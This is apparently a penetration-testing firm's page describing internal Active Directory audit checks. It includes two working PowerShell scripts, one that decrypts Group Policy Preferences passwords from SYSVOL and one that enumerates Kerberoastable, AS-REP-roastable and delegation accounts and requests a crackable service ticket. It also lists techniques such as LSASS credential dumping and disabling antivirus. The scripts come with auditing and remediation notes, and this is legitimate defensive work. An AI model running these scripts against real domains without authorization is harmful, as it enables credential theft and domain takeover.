Security Audit - AD
FIREWALL
An internal penetration test in a Windows environment simulates the actions of an attacker who already has access to the corporate network, whether physically (a free network port, a meeting room) or through a compromised workstation. The objectives of this type of test are multiple:
List the technical vulnerabilities affecting the audited scope and analyze their impact
Take control of the Active Directory domain
List the methods of remote access persistence and data exfiltration to the internet
Issue an action plan to improve the level of security
Here are some examples of points verified by our auditors during this type of service:
Active Directory
Network
Passive listening to authentication requests
MITM attacks (LLMNR/NBT-NS poisoning, relay) to collect credentials
Enumeration and port scanning of the domain's servers
Retrieving the content of the SYSVOL share and searching for information in the GPOs and scripts
Search for anonymously accessible file shares
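The SYSVOL check above is worth a concrete illustration, because the most common finding there is a Group Policy Preferences file that still carries a "cpassword" attribute: the value is AES-256 encrypted, but with a key Microsoft published in its own documentation, so any domain user can recover the plaintext. The script below is an added example, not the audit firm's tooling. It assumes the current user can read \\<domain>\SYSVOL (true for any domain member) and takes the domain from $env:USERDNSDOMAIN.

```powershell
# Added example: find GPP files in SYSVOL that still contain a cpassword and decrypt it.
# Assumption: the running user is a domain member and can reach \\$Domain\SYSVOL.
param(
    [string]$Domain = $env:USERDNSDOMAIN   # assumption: audit the current user's domain
)

# AES-256 key from the public GPP documentation (MS14-025); identical in every domain.
$GppKey = [byte[]]@(
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
)

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the base64 '=' padding; restore it before decoding.
    switch ($Cpassword.Length % 4) {
        1 { $Cpassword = $Cpassword.Substring(0, $Cpassword.Length - 1) }
        2 { $Cpassword += '==' }
        3 { $Cpassword += '=' }
    }
    $cipher = [Convert]::FromBase64String($Cpassword)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GppKey
    $aes.IV      = New-Object byte[] 16        # all-zero IV, as in the published scheme
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    $aes.Dispose()
    # The plaintext is the password as UTF-16LE.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

# Preference files that can embed an account and its password.
$files = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
$userAttrs = 'userName','runAs','accountName','username'   # attribute naming differs per file type

Get-ChildItem -Path "\\$Domain\SYSVOL\$Domain\Policies" -Recurse -Include $files -ErrorAction SilentlyContinue |
  ForEach-Object {
    [xml]$doc = Get-Content -LiteralPath $_.FullName -Raw
    foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
        $user = ($node.Attributes | Where-Object { $_.Name -in $userAttrs } | Select-Object -First 1).Value
        [pscustomobject]@{
            File     = $_.FullName
            User     = $user
            Password = ConvertFrom-GppCpassword $node.cpassword
        }
    }
  }
```

A finding here is rarely "just" a local administrator password: the same credential is typically reused on every machine the GPO applies to, which is why it sits in the Network section rather than under local accounts. The remediation is to delete the preference item (patching the GPMC only stops new ones from being created; existing files stay in SYSVOL).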
List of accounts
Replay of credentials from stolen databases exposed on the Internet (password reuse)
Search for usernames in the metadata of files published on the Internet
Enumeration of Active Directory users and groups using compromised accounts
Brute force of domain accounts and local server accounts
Kerberos
Retrieving the list of Service Principal Names
Attempt to crack TGS tickets and AS-REP responses offline (Kerberoasting, AS-REP roasting)
Exploiting dangerous Kerberos delegation
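The three Kerberos checks above come down to one LDAP pass: which accounts carry an SPN (Kerberoasting), which ones have pre-authentication disabled (AS-REP roasting), and which ones are configured for unconstrained, constrained or resource-based constrained delegation. The script below is an added example, not the audit firm's tooling. It uses only the built-in [adsisearcher] accelerator (no RSAT module needed) against the current user's domain, and the SPN used in the final ticket request is a placeholder, not one from the page.

```powershell
# Added example: enumerate Kerberos attack surface with a plain domain user account.
# Assumption: run from a domain-joined host as any authenticated domain user.
$searcher = [adsisearcher]''
$searcher.PageSize = 1000                       # page results so large domains are not truncated
$searcher.PropertiesToLoad.AddRange([string[]]@(
    'samaccountname','serviceprincipalname','useraccountcontrol',
    'msds-allowedtodelegateto','msds-allowedtoactonbehalfofotheridentity'))

# Matching rule 1.2.840.113556.1.4.803 is a bitwise AND against userAccountControl.
$checks = [ordered]@{
    # Kerberoasting: enabled user accounts with an SPN; their TGS is encrypted with the
    # account's password hash and can be cracked offline. krbtgt is excluded on purpose.
    Kerberoastable = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    # AS-REP roasting: DONT_REQ_PREAUTH (0x400000); the AS-REP is obtainable without the password.
    AsRepRoastable = '(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
    # Unconstrained delegation: TRUSTED_FOR_DELEGATION (0x80000) on something that is not a DC
    # (primaryGroupID 516); such a host caches the TGT of every user that authenticates to it.
    Unconstrained  = '(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))'
    # Constrained delegation (with or without protocol transition, TRUSTED_TO_AUTH_FOR_DELEGATION 0x1000000).
    Constrained    = '(msDS-AllowedToDelegateTo=*)'
    # Resource-based constrained delegation, set on the target object's security descriptor attribute.
    RBCD           = '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)'
}

foreach ($name in $checks.Keys) {
    $searcher.Filter = $checks[$name]
    foreach ($r in $searcher.FindAll()) {
        $p = $r.Properties
        [pscustomobject]@{
            Check      = $name
            Account    = [string]$p['samaccountname'][0]
            SPNs       = ($p['serviceprincipalname'] -join ';')
            DelegateTo = ($p['msds-allowedtodelegateto'] -join ';')
            UAC        = '0x{0:x}' -f [int]$p['useraccountcontrol'][0]
        }
    }
}

# Kerberoasting proper: requesting a service ticket is an ordinary client operation the KDC
# will not refuse. The ticket lands in the LSA cache (see klist) and is then extracted for
# offline cracking; only RC4 tickets (etype 23) crack at a useful speed.
Add-Type -AssemblyName System.IdentityModel
$spn = 'MSSQLSvc/sql01.corp.example:1433'   # assumption: an SPN returned by the Kerberoastable query
$null = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
```

Two caveats an auditor keeps in mind: service-ticket requests show up as event 4769 on the domain controllers, so bulk requests are noisy, and a Kerberoastable account is only a finding if its password is crackable or it holds privileges; the remediation is long random passwords (or gMSA) for SPN accounts and removing the "do not require pre-authentication" flag.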
Domain
Identification of domain controllers
Search for vulnerabilities on domain controllers
Exploitation of dangerous ACLs
Analysis of trust relationships
Windows servers and clients
Updates
Exploitation of missing operating system patches
Exploitation of missing patches on installed software
Search for vulnerabilities in the services exposed by the servers
Bypassing Microsoft protections
UAC
SRP
AppLocker
Accounts and passwords
Enumeration of local accounts and brute force of their passwords
List of service accounts and scheduled tasks
Retrieving credentials from the memory of the LSASS process
Collection and cracking of high-privilege account passwords
Various
Retrieving credentials stored in scripts
Attacking the antivirus (forced shutdown, addition of exception, etc.)
Malicious USB media insertion